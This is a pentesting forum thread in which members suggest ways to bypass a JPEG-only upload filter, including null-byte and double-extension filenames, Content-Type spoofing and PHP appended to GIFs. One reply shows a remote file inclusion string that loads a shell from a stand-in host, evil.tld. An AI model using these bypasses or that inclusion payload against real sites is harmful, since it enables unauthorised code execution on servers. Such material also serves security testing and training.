.

Bypassing File Upload Restrictions

<<

T_Bone

Full Member
Full Member

Posts: 199

Joined: Sat Feb 21, 2009 7:11 am

Post Tue Dec 20, 2011 3:44 pm

Bypassing File Upload Restrictions

Hi All

Ok, so I am trying to bypass the validation on a file upload form. It is only supposed to accept .jpg (and may effectively work). The images get uploaded to the webroot so would be great to bypass it.  I have tried changing the MIME type, saving a script as .jpg, I believe you can add the .jpg header to a file which may work, any other suggestions?
<<

alan

User avatar

Newbie
Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Tue Dec 20, 2011 4:11 pm

Re: Bypassing File Upload Restrictions

Try adding a null character - test.php%00.jpg

Also check OWASP site https://www.owasp.org/index.php/Unrestricted_File_Upload for plenty more options I wouldn't have immediately thought of, like using alternate data streams. :)
<<

Seen

User avatar

Full Member
Full Member

Posts: 137

Joined: Mon Aug 30, 2010 1:05 am

Post Wed Dec 21, 2011 2:16 am

Re: Bypassing File Upload Restrictions

I came across a lab on eLearnSecurity where you could bypass the restriction by just making sure ".jpg" was in the filename.  I though that was a pretty cool bypass.

So you could try naming the file something like "file.jpg.php" for example.
Sec+, eCPPT
<<

millwalll

Post Fri Dec 23, 2011 4:35 pm

Re: Bypassing File Upload Restrictions

seen was going to recommended the same.
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Tue Dec 27, 2011 11:58 am

Re: Bypassing File Upload Restrictions

The null-byte trick will only work if nullbytes are not filtered from the input. The reason why a nullbyte is used, is because an include or require function is often made somewhat like this:
$config = $_GET['config']. ".conf"; require_once($config);


In this case, the ?config parameter / argument is most likely vulnerable unless there's a "catch-all" GET-request function sanitizing them all.

As you want to include a php file, which the target server should be able to read and parse, you should add a %00 byte which there are some variations of.

If the parameter is like this: ?config=http://evil.tld/shell.txt

The actual $config variable will become: http://evil.tld/shell.txt.conf, but by adding a %00 byte (?config=http://evil.tld/shell.txt%00) the webserver will stop reading the input after the null-byte and the $config variable will automatically be http://evil.tld/shell.txt as the rest is stripped away this one time.

In case of file upload forms, files named like: file.jpg.php is often enough. At least it was, but nowadays it is only the most poorly secured sites that enable this attack, meaning you may have to add an actual file header in case the file is processed and needs to actually be an image.

In this case, you can take any gif file, and append your PHP data to it and then upload it. The image should still be valid even if it's processed. If it's resized however, the php data may be lost.

It could theoretically also be possible to name the file file.php%00.jpg, however it may not work depending on how the file is read, but also how your client sends the data. (The client may sanitize the % sign as well.)

Even though I haven't said much than what Seen and alan said, I thought I'd say it anyway in my own words  :)
I'm an InterN0T'er
<<

nytfox

User avatar

Newbie
Newbie

Posts: 20

Joined: Mon Nov 28, 2011 1:54 am

Post Sun Jan 29, 2012 2:48 am

Re: Bypassing File Upload Restrictions

I agree with what Maxxe said . but include to that . all you have to do is misdirect the vailidations on the upload scrtipt . like "Content-Type" when your uploading a image you might be having a application as type . change it to image/jpeg . like wise their are lota ways you can upload a execution file as a image .

still some scripts cruch the image and make thumbs and change resolutions . if the image is getting cruch like that . you might have a issue upload the image . but still their few php function issues, I have put a ref link bellow

http://ha.ckers.org/blog/20070604/passi ... imagesize/
Unlike others I love NULLS
http://treasuresec.com

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 1 guest

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software